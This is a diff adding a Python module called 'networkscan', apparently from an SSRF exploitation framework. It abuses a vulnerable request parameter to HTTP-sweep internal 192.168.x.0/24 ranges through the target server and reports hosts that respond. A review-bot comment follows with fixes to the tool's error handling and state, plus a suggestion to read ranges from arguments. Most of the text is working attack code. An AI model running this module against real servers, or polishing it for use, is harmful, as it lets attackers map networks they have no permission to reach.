1+ from utils .utils import *
2+ from datetime import datetime
3+ import sys , struct , socket
4+ import logging
5+ import concurrent .futures
6+
7+ name = "networkscan"
8+ description = "Scan the network - HTTP Ping sweep"
9+ author = "errorfiathck"
10+ documentation = []
11+
12+ class exploit ():
13+ ips = set ()
14+
15+ def __init__ (self , requester , args ):
16+ logging .info (f"Module '{ name } ' launched !" )
17+
18+ # concurrent requests in order to limit the time
19+ self .add_range ("192.168.1.0/24" ) # Default network
20+ self .add_range ("192.168.0.0/24" ) # Default network
21+
22+ # Uncomment these lines if you need to scan more networks
23+ # self.add_range("172.17.0.0/16") # Docker network
24+ # self.add_range("172.18.0.0/16") # Docker network
25+
26+
27+
28+ r = requester .do_request (args .param , "" )
29+ with concurrent .futures .ThreadPoolExecutor (max_workers = None ) as executor :
30+ future_to_url = {executor .submit (self .concurrent_request , requester , args .param , ip , "80" , r ): ip for ip in self .ips }
31+
32+
33+ def add_range (self , ip_cidr ):
34+ (ip , cidr ) = ip_cidr .split ('/' )
35+ cidr = int (cidr )
36+ host_bits = 32 - cidr
37+ i = struct .unpack ('>I' , socket .inet_aton (ip ))[0 ] # note the endianness
38+ start = (i >> host_bits ) << host_bits # clear the host bits
39+ end = start | ((1 << host_bits ) - 1 )
40+
41+ for i in range (start , end ):
42+ self .ips .add (socket .inet_ntoa (struct .pack ('>I' ,i )))
43+
44+
45+ def concurrent_request (self , requester , param , host , port , compare ):
46+ try :
47+ payload = wrapper_http ("" , host , port .strip ())
48+ r = requester .do_request (param , payload )
49+
50+ if (not "Connection refused" in r .text ) and (r .text != compare .text ):
51+ timer = datetime .today ().time ().replace (microsecond = 0 )
52+ print (f"\t [{ timer } ] Found host :{ host + ' ' * 40 } " )
53+
54+ timer = datetime .today ().time ().replace (microsecond = 0 )
55+ except Exception as e :
56+ pass
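Review bot: The `except Exception as e: pass` at the end of `concurrent_request` hides every failure, and because `__init__` never reads the futures stored in `future_to_url`, a run in which every request errors out looks the same as a run that found no hosts. Logging the error, for example `except Exception as e: logging.debug(f"request for {host} failed: {e}")`, would make the two cases distinguishable. `ips = set()` is a class attribute, so every `exploit` instance in the same process shares one growing set; `self.ips = set()` at the top of `__init__` avoids that. The two /24 ranges are hard-coded in `__init__`, so each run probes both regardless of the scope the operator intends; reading the ranges from `args` would keep a run bounded to that scope. The second `timer = ...` assignment after the `if` is never used and can be dropped.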